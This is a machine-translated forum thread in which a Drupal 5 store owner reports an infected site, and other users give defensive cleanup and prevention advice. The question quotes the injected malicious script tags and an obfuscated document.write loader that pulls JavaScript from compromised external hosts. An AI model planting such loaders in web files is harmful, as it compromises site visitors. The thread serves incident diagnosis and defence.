Meu site foi atacado?

Navegue suas respostas
3

Trata-se de uma loja online baseada no Drupal 5.

De repente, não funcionou mais. Ao acessar o site, esse erro surgiu:

Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38

Após inspeção adicional, encontrei as duas linhas seguintes no final do dito index.php: 

<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script><!--7379ba6e55616ea66ac9d812fc0597ba-->

Depoisderemovermanualmenteessasduaslinhas,ositeparecefuncionarbemnovamente.

Masdepoisquemaisproblemas(comediçãodepáginas)foramreportados,descobriquenaverdadetodososarquivos*.jsestão"infectados". Todos eles contêm uma linha extra no final: 

document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');

Estesitefoiinvadido?Aoprocurarpor"blog.nodisposable.com", nada de interessante aparece. Esse site em si parece legítimo. Provavelmente é hackeado em si?

Alguém pode explicar como isso poderia ter acontecido? O que posso fazer para reverter isso? E o que posso fazer para evitar isso no futuro?

Atualizar

Depois de restaurar um backup do site (não do banco de dados), aconteceu novamente, mas agora a tag de script apontava para dolfy.sedonahyperbarics.com:8080/XHTML.js .

Aparentemente, muitas contas de usuário aleatórias do Drupal também foram criadas. Isso pode ser um sinal de que, na verdade, era uma vulnerabilidade do Drupal.
Nós os removemos e restringimos a criação de contas de usuários apenas para administradores (deveria ter sido isso desde o começo, eu sei: -s). Também mudamos a senha do usuário administrador para algo mais seguro .
Vamos esperar que não volte agora.

    
por fretje 16.06.2010 / 15:15

4 respostas

3

Se ele foi hackeado, você não sabe se há uma porta dos fundos instalada.

Você pode ter que reinstalar a partir de um backup em bom estado depois de uma reformatação.

Nunca confie em um sistema que tenha um intruso no sistema.

Para evitar isso no futuro, você precisa acompanhar as atualizações e inscrever-se em listas atualizadas com as vulnerabilidades e as práticas recomendadas para o software que está executando (listas do drupal, listas de segurança da sua plataforma, etc), bem como serviços de bloqueio para apenas os usuários que são necessários para usar o sistema, usando senhas seguras, não fazendo nada em texto não criptografado e tudo o mais em melhores práticas de segurança que se estende muito além do contexto da resposta aqui. E mantenha bons backups e instale a detecção de intrusão (como um sistema semelhante ao Tripwire) para verificar a atividade do intruso.

    
por 16.06.2010 / 15:36
1

Sim, você está infectado, estou com medo. O "como" é, infelizmente, impossível dizer sem muito mais investimento em tempo e esforços. Poderia ter sido uma vulnerabilidade na sua instalação do Drupal (ou um de seus módulos), poderia ter sido uma vulnerabilidade em outro aplicativo no mesmo servidor, poderia ter sido uma senha de FTP fraca (ou roubada), etc. de possíveis pontos de entrada.

    
por 16.06.2010 / 15:34
1

Eu vi algo muito similar (quase idêntico), mas não relacionado ao Drupal e definitivamente foi um hack.

Como os outros dizem, é difícil saber sem mais informações sobre seu ambiente. Uma coisa rápida que você pode fazer para bloqueá-lo é colocar uma diretiva em seu arquivo .htaccess que negará ou redirecionará qualquer pedido para o arquivo .js.

    
por 16.06.2010 / 15:46
1

Embora completamente baseado em apenas minha própria experiência, cada hack como este, especialmente com re-infecção, foi devido a alguém com acesso FTP ao servidor com sua máquina local infectada e algo roubando credenciais - você deseja verificar logs de FTP e certifique-se de reconhecer todos os endereços IP e atualizações como válidos - se algo estiver infectando novamente, você deverá vê-lo facilmente, se for o caso.

    
por 15.09.2010 / 17:51

Tags

Como configuro uma rede de pequena empresa com todos os recursos? Crie uma autoridade de certificação TLS restrita a um domínio?